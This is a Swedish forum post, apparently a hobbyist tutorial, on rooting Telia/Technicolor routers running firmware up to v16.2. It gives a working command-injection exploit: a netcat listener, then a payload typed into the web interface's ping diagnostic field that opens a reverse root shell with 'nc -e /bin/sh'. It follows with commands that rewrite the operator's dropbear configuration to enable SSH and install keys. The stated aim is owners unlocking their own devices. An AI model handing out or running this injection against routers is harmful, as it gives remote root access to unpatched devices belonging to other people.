Sorry, inte varit inloggad på ett tag och fått lite meddelanden av några som vill ta sig in i sin router så jag försöker sätta ihop en enkel tutorial här. Brukar inte skriva tutorials direkt så det blir som det blir, lets go!
Detta fungerar till v16.2 Jade, telias nuvarande version. Har du 17.x och vill nedgradera dig igen så pma så skickar jag ett tool för att nedgradera din firmware.
Client side:
1. Dra hem en valfri linux dist och installera netcat om det inte finns förinstallerat.
- Finns säkert till powershell också skulle jag tro om man kör Windows.
2. Kör igång en netcat listener på följande vis
root@sweclockers $ nc -lvvp 1337
listening on [any] 1337 ...
-
3. Logga in på http://192.168.1.1 eller http://dlsdevice.lan
2. Klicka på advanced setup
3. Klicka på inställningar för: Diagnostics Ping&Trace
4. I ping rutan skriv:
:::::::;nc 192.168.1.x 1337 -e /bin/sh (naturligtvis ip-nummret till din maskin som har netcat igång på port 1337)
The magic is now done, you're in!
sh-4.4# nc -lvvp 1337
listening on [any] 1337 ...
connect to [192.168.1.104] from router [192.168.1.1] 35835
https://sendit.nu/f/Pj1dnAsPJnirz.png
- Nu börjar det roliga.
Går igenom det viktigaste annars får jag sitta hela natten då det finns otroligt mycket att ställa in och leka med.
Byt root password:
skriv 'passwd' när du ser att du är ansluten.
Spana in operatörens setup för att bevittna deras backdoor med egna ögon:
cat /etc/config/dropbear
Denna config vill vi editera, hanterar du vi/vim så är de bara att editera 'vim /etc/config/dropbear'
Är du inte van med vim så använd sed bara för att editera configen:
Ändra operatörens settings till off och 0 eller kommenetera ut deras settings bara genom att skriv:
sed -i '1,18 s/^/#/' /etc/config/dropbear
sed -i '20s/off/on/' /etc/config/dropbear; sed -i '21s/off/on/' /etc/config/dropbear; sed -i '24s/0/1/' /etc/config/dropbear
Bör se ut något såhär:
https://sendit.nu/f/aKHBmzPHKxSBnB.png
Reboota inte ännu
Starta om dropbear genom att skriva
/etc/init.d/dropbear restart
ssh:a in till routern så är du inne och ser deras welcome message:
https://sendit.nu/f/lyatoppoTdk7RC.jpg
-
Härifrån kan du ändra precis ALLT, bridge mode, dns modes, serie nummer, yeah you name it! Men det tar vi en annan gång, för att installera paket använd opkg. /bin/opkg
/bin/opkg list-installed # för att lista telias & technicolors förinstallerade skit
/bin/opkg update # för att hämta en uppdaterad package list
/bin/opkg install package # för att installera paket
/bin/opkg search package # för att söka efter paket.
http://pkg.entware.net/binaries/armv5/ är vad som är inställt från fabrik, vill du lägga till fler källor så är det i /etc/opkg.conf det skall läggas till.
root@OpenWrt:~# cat /etc/opkg.conf .
src/gz packages http://pkg.entware.net/binaries/armv5
dest root /
dest ram /opt/tmp
lists_dir ext /opt/var/opkg-lists
option tmp_dir /opt/tmp
- Ni kan även lägga till massa funktioner som openvpn, ändra sync tider, fixa usb sharing som har varit blockerat tidigare. Ja precis allt som man skall kunna göra helt enkelt.
Lycka till!
Edit: Ja just, vill du inte ha password auth tillåten så är det dropbear som gäller, bara installera dropbear på valfri dist:
Generera din nyckel genom att skriva:
dropbearkey -t rsa -f /etc/dropbear/authorized_keys -s 4096
Följt av:
ssh root@192.168.1.1 "tee -a /etc/dropbear/authorized_keys" < ~/.ssh/id_rsa.pub
Du kan nu reboota routern genom att skriva 'reboot' när du ställt in allt.
Dropbear kommer vara igång från boot om du ställt in dropbear rätt.
Nu är det bara att ansluta utan password i framtiden från din maskin.
// wuseman
